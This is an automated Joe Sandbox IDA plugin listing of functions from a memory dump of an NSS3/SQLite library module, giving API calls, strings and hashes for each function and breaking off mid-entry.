Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: f43f7779ce20d610674eecb81d6d5d7790f4a27619d3dae9122026f2cd317c96
Instruction ID: 117d2f3c65b29898456e21663fcd6e1de240bc135b30f18fc3b54df60e399fb0
Opcode Fuzzy Hash: f43f7779ce20d610674eecb81d6d5d7790f4a27619d3dae9122026f2cd317c96
Instruction Fuzzy Hash: A302EFB1B043004BE7149F719A8A72B36B2BBC560CF54893CD85A87B41EF75E95AC7C2

Function 6C79A4D0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6C7728AD,pkcs11:,00000007), ref: 6C79A501
PORT_Strdup_Util.NSS3(6C7728AD), ref: 6C79A514

Part of subcall function 6C7D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
Part of subcall function 6C7D0F10: malloc.MOZGLUE(00000001), ref: 6C7D0F30
Part of subcall function 6C7D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6C79A529
PK11_GetInternalKeySlot.NSS3 ref: 6C79A60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C79A74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C79A777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C79A80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6C79A82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6C79A952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C79A9C3

Part of subcall function 6C7C0960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6C79A8F5,00000000,?,00000010), ref: 6C7C097E
Part of subcall function 6C7C0960: memcmp.VCRUNTIME140(?,00000000,6C79A8F5,00000010), ref: 6C7C098D

free.MOZGLUE(00000000), ref: 6C79AB18
strchr.VCRUNTIME140(?,00000040), ref: 6C79AB40
free.MOZGLUE(?), ref: 6C79ABE1

Part of subcall function 6C794170: TlsGetValue.KERNEL32(?,6C7728AD,00000000,?,6C79A793,?,00000000), ref: 6C79419F
Part of subcall function 6C794170: EnterCriticalSection.KERNEL32(0000001C), ref: 6C7941AF
Part of subcall function 6C794170: PR_Unlock.NSS3(?), ref: 6C7941D4

Strings

manufacturer, xrefs: 6C79A8A2
object, xrefs: 6C79A5CF
token, xrefs: 6C79A875
model, xrefs: 6C79A8CF
pkcs11:, xrefs: 6C79A4FB

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token
API String ID: 916065474-709816111
Opcode ID: 410348e018842cd68b7f05c25971d5e3dda40cbdff3e211c6356126a4a7420c7
Instruction ID: e519cdfc17e6c7701e8b3f7f51e4bb6602c1bdbe375d5cd89eae8aa633bcc287
Opcode Fuzzy Hash: 410348e018842cd68b7f05c25971d5e3dda40cbdff3e211c6356126a4a7420c7
Instruction Fuzzy Hash: C802B8B5D022149FEF219B35BE49B9A7675AF0135CF1400B4E90CA6B12FB319E58CF92

Function 6C7BA650 Relevance: 31.8, APIs: 21, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7BA670

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PK11_GetInternalKeySlot.NSS3 ref: 6C7BA67E
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C7BA69B

Part of subcall function 6C799520: PK11_IsLoggedIn.NSS3(00000000,?,6C7C379E,?,00000001,?), ref: 6C799542

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BA6C0
TlsGetValue.KERNEL32 ref: 6C7BA703
EnterCriticalSection.KERNEL32(?), ref: 6C7BA718
PR_Unlock.NSS3(?), ref: 6C7BA78B
PK11_CreateContextBySymKey.NSS3(00000133,00000104,?,00000000), ref: 6C7BA7DD
PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C7BA7FA
PORT_Alloc_Util.NSS3(00000000), ref: 6C7BA818
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7BA82F
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BA868
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7BA873
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7BA884
PK11_FreeSymKey.NSS3(00000000), ref: 6C7BA894
PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C7BA8D9
PK11_CipherOp.NSS3(?,00000000,?,00000000,00000000,00000000), ref: 6C7BA8F0
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8D0B04), ref: 6C7BA93F
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BA952
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7BA961
PK11_DestroyContext.NSS3(?,00000001), ref: 6C7BA96E

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$K11_$Item_$Zfree$Arena_Free$Alloc_ArenaContext$AuthenticateBlockCipherCreateCriticalDestroyEncodeEnterInitInternalLockLoggedPoolSectionSizeSlotUnlockValuecallocmemcpy
String ID:
API String ID: 1441238854-0
Opcode ID: 55f58ab63158b2de14446c924c4646be8a92fe5e28c0e9586663f2418d74fcc3
Instruction ID: b338d5c0666e7800a89143631528e5add63339fabcded2a765018e7001b7de25
Opcode Fuzzy Hash: 55f58ab63158b2de14446c924c4646be8a92fe5e28c0e9586663f2418d74fcc3
Instruction Fuzzy Hash: 4D91D7B1E002099FEB01EFA5DE49AAEBBB4AF1531CF144435E814BB741F731A909C791

Function 6C79E6E0 Relevance: 30.6, APIs: 20, Instructions: 581memorythreadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C79E8AB
EnterCriticalSection.KERNEL32(?), ref: 6C79E8BF
PORT_Alloc_Util.NSS3(0000000C), ref: 6C79EA30
PK11_Encrypt.NSS3(?,?,?,?,?,?,00000000,?), ref: 6C79EA6A
PORT_Alloc_Util.NSS3(?), ref: 6C79EB0D
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C79EB23
memcpy.VCRUNTIME140(?,?), ref: 6C79EB38
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C79EB50
PR_SetError.NSS3(00000000,00000000), ref: 6C79EC0F
PR_Unlock.NSS3(?), ref: 6C79EC68
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C79EC7D
PR_Unlock.NSS3(?), ref: 6C79EC9C
PK11_Decrypt.NSS3(?,?,?,?,?,?,00000000,?), ref: 6C79ECCF
PR_GetCurrentThread.NSS3 ref: 6C79ED02
PK11_Decrypt.NSS3(?,00001087,?,?,?,?,?,?), ref: 6C79ED6F
PK11_Encrypt.NSS3(?,00001087,?,?,?,?,?,?), ref: 6C79EDB7
memcpy.VCRUNTIME140(?,?,?), ref: 6C79EDF6
memcpy.VCRUNTIME140(?,?), ref: 6C79EE12
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C79EE2B

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

free.MOZGLUE(?), ref: 6C79EE43

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$ErrorK11_memcpy$Alloc_DecryptEncryptUnlockUtilcalloc$CriticalCurrentEnterSectionThreadfree
String ID:
API String ID: 1743700497-0
Opcode ID: a66109bb136f479263d143f208301f7ba00f9eea37433df10ab9747875c85334
Instruction ID: ddde9d6e5bd7ce01d85956ec1e65dc497401aa7db85ff1d9bab5fad6110f3289
Opcode Fuzzy Hash: a66109bb136f479263d143f208301f7ba00f9eea37433df10ab9747875c85334
Instruction Fuzzy Hash: 083245B1604309DFDB14CF69D980A9ABBF1BF89308F14892DE89997761D731E844CF92

Function 6C762560 Relevance: 30.3, APIs: 10, Strings: 7, Instructions: 533stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7625B2
memset.VCRUNTIME140(00000000,00000000,00000079), ref: 6C7625DE
sqlite3_snprintf.NSS3(-0000000F,00000068,%s-shm,?), ref: 6C762604
sqlite3_initialize.NSS3 ref: 6C76269D
sqlite3_uri_parameter.NSS3(?,readonly_shm), ref: 6C7626D6
sqlite3_initialize.NSS3 ref: 6C76289F
EnterCriticalSection.KERNEL32(?), ref: 6C7629CD
LeaveCriticalSection.KERNEL32(?), ref: 6C762A26
sqlite3_free.NSS3(?), ref: 6C762B30

Strings

winShmMap1, xrefs: 6C762AB0
readonly_shm, xrefs: 6C7626CE
winShmMap2, xrefs: 6C762BD0
winShmMap3, xrefs: 6C762C08, 6C762C3D
winFileSize, xrefs: 6C762A7D
%s-shm, xrefs: 6C7625FD
winOpenShm, xrefs: 6C762B7E

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_initialize$memsetsqlite3_freesqlite3_snprintfsqlite3_uri_parameterstrlen
String ID: %s-shm$readonly_shm$winFileSize$winOpenShm$winShmMap1$winShmMap2$winShmMap3
API String ID: 3867263885-4021692097
Opcode ID: 2a83b69288b9d0089a93ebfc2afed182e347c2d11c26eff59007c1506093cbfb
Instruction ID: 1bfe7ec9de6b98e1e1747990f3726696d5f71c34cae501e704a712d6adf49c77
Opcode Fuzzy Hash: 2a83b69288b9d0089a93ebfc2afed182e347c2d11c26eff59007c1506093cbfb
Instruction Fuzzy Hash: 82129871A042019FEB64CF26D988A6A77B1BF89318F14893CEC459BB51DB34ED05CBD2

Function 6C72A7D0 Relevance: 28.2, APIs: 5, Strings: 8, Instructions: 5451COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C72A973

Strings

too many arguments on %s() - max %d, xrefs: 6C72EB2D
SCAN CONSTANT ROW, xrefs: 6C72B01D
gfff, xrefs: 6C72ED41
INDEX %d, xrefs: 6C72D786
abbreviated query algorithm search, xrefs: 6C72B3BF
MULTI-INDEX OR, xrefs: 6C72D6E6
N, xrefs: 6C72AD0F
at most %d tables in a join, xrefs: 6C72B630

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset
String ID: N$INDEX %d$MULTI-INDEX OR$SCAN CONSTANT ROW$abbreviated query algorithm search$at most %d tables in a join$gfff$too many arguments on %s() - max %d
API String ID: 2221118986-452224314
Opcode ID: 98fb82009f8ed43dd5d17fd70d1f14df4064e18408bc97cb32eb7c29325282c5
Instruction ID: fcd1ef826b42de936f70cfd18c9a733876a87a48396cb5b53fd410b25982ce9a
Opcode Fuzzy Hash: 98fb82009f8ed43dd5d17fd70d1f14df4064e18408bc97cb32eb7c29325282c5
Instruction Fuzzy Hash: 7DB34D746083418FD324CF29C690B5AB7F2FF89318F14896DE9998B752D739E846CB42

Function 6C7DA730 Relevance: 27.4, APIs: 18, Instructions: 378memorystringCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7DA778

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

Part of subcall function 6C7DB990: PORT_NewArena_Util.NSS3(00000800,00000000,?,FFFFFFFF,?,6C7DA78B,?), ref: 6C7DB9A4
Part of subcall function 6C7DB990: PORT_ArenaAlloc_Util.NSS3(00000000,00000014,?), ref: 6C7DB9B5
Part of subcall function 6C7DB990: PK11_HashBuf.NSS3(00000004,00000000,E4840FC0,89000000,?,?,?), ref: 6C7DB9D9
Part of subcall function 6C7DB990: PR_SetError.NSS3(FFFFE013,00000000,?,?,?), ref: 6C7DB9EC
Part of subcall function 6C7DB990: PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C7DBA0A

Part of subcall function 6C7DA3F0: PORT_ArenaMark_Util.NSS3(?), ref: 6C7DA43E
Part of subcall function 6C7DA3F0: PORT_ArenaMark_Util.NSS3(FFFFFFFF,?,?,?,?,?,?,00000000,?,-0000001C,?,6C7DA7B5,?), ref: 6C7DA457
Part of subcall function 6C7DA3F0: PORT_ArenaAlloc_Util.NSS3(FFFFFFFF,00000018,?,?,?,?,?,?,?,00000000,?,-0000001C,?,6C7DA7B5,?), ref: 6C7DA464
Part of subcall function 6C7DA3F0: SECOID_FindOIDByTag_Util.NSS3(000000A8,?,?,?,?,?,?,?,?,?,00000000,?,-0000001C,?,6C7DA7B5,?), ref: 6C7DA48D
Part of subcall function 6C7DA3F0: SECITEM_CopyItem_Util.NSS3(FFFFFFFF,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,-0000001C), ref: 6C7DA49F
Part of subcall function 6C7DA3F0: PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,-0000001C), ref: 6C7DA4B2

PORT_ArenaMark_Util.NSS3(?), ref: 6C7DA7FC
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C7DA891
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C7DA8AF
PORT_ArenaAlloc_Util.NSS3(?,00000038), ref: 6C7DA8C0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7DA967
PK11_GetInternalKeySlot.NSS3 ref: 6C7DA981
PK11_FindKeyByAnyCert.NSS3(00000000,?), ref: 6C7DA9A1
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C7DA9DA
PORT_ArenaAlloc_Util.NSS3(?,00000028), ref: 6C7DAA04
SECKEY_DestroyEncryptedPrivateKeyInfo.NSS3(?,00000001), ref: 6C7DAA45
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7DAA70
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DAAE3
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7DAB10
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7DAB7D
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7DABD8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DAC0F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Error$Arena_K11_Mark_$DestroyFindFreePrivate$Cert$CopyCriticalEncryptedEnterHashInfoInternalItem_SectionSlotTag_UnlockValuestrlen
String ID:
API String ID: 4141365096-0
Opcode ID: 5f865054e3946d455471752a1c96b2e4e26b5c11683a14e879b4167e639bbceb
Instruction ID: 4f670a0e855d1d5c616ad64bf0f42434d8166cba4eed709788b64e4fcdd03231
Opcode Fuzzy Hash: 5f865054e3946d455471752a1c96b2e4e26b5c11683a14e879b4167e639bbceb
Instruction Fuzzy Hash: 48D1D375A043009FEB00CF24DA44B9B3BA5BF8536CF168638E8489B791E731F945CB92

Function 6C76EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76EF63

Part of subcall function 6C7787D0: PORT_NewArena_Util.NSS3(00000800,6C76EF74,00000000), ref: 6C7787E8
Part of subcall function 6C7787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C76EF74,00000000), ref: 6C7787FD
Part of subcall function 6C7787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C77884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C76F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C76F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C76F374
PL_strcasecmp.NSS3(6C8B2FD4,?), ref: 6C76F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C76F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C76F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C76F67D
CERT_DestroyName.NSS3(?), ref: 6C76F68B

Part of subcall function 6C778320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C778338
Part of subcall function 6C778320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C778364
Part of subcall function 6C778320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C77838E
Part of subcall function 6C778320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7783A5
Part of subcall function 6C778320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7783E3

Part of subcall function 6C7784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C7784D9
Part of subcall function 6C7784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C778528

Part of subcall function 6C778900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C778955

Strings

*, xrefs: 6C76F3C6
oid., xrefs: 6C76F2CF
", xrefs: 6C76F21B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 6ffeabcbd96bde21999d43d5b794f0b86d47114f91c7c76f0446a1fbcf55461a
Instruction ID: bd725fc96599827d6cba9b5920d9647394b0953191b786459675dedd800f91d4
Opcode Fuzzy Hash: 6ffeabcbd96bde21999d43d5b794f0b86d47114f91c7c76f0446a1fbcf55461a
Instruction Fuzzy Hash: A62219716083414FD714CE2ACA9076AB7E6AB85358F184A3EECD587F92E7319C05CB93

Function 6C7CA5E0 Relevance: 23.1, APIs: 15, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96d817ae28d0eef86f2e9cf151409beeda96f1b6b7dbbd8f3f0162df3b929a77
Instruction ID: 9e152f32ef7dc67676d5c9f5228dc58e7bfe27d66f490d6aedb0b4c19eeb63ed
Opcode Fuzzy Hash: 96d817ae28d0eef86f2e9cf151409beeda96f1b6b7dbbd8f3f0162df3b929a77
Instruction Fuzzy Hash: E5124E70F0425A4FCB258E388A917ED77F1AF4A33AF2841F9C59957A41D2318E85CB93

Function 6C7A0570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C7A05E3
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7A060C
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C7A061A
PK11_PubDeriveWithKDF.NSS3 ref: 6C7A0712
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A0740
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7A0760
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C7A07AE
PK11_FreeSymKey.NSS3(?), ref: 6C7A07BC
PK11_FreeSymKey.NSS3(?), ref: 6C7A07D1
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C7A07DD
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7A07EB
SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C7A07F8
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C7A082F
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A08A9
SECITEM_DupItem_Util.NSS3(?), ref: 6C7A08D0

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
String ID:
API String ID: 657680294-0
Opcode ID: 1c6a34649447dade52379f0f7f8e0d2fff6847166c162968fb90078e82b6de00
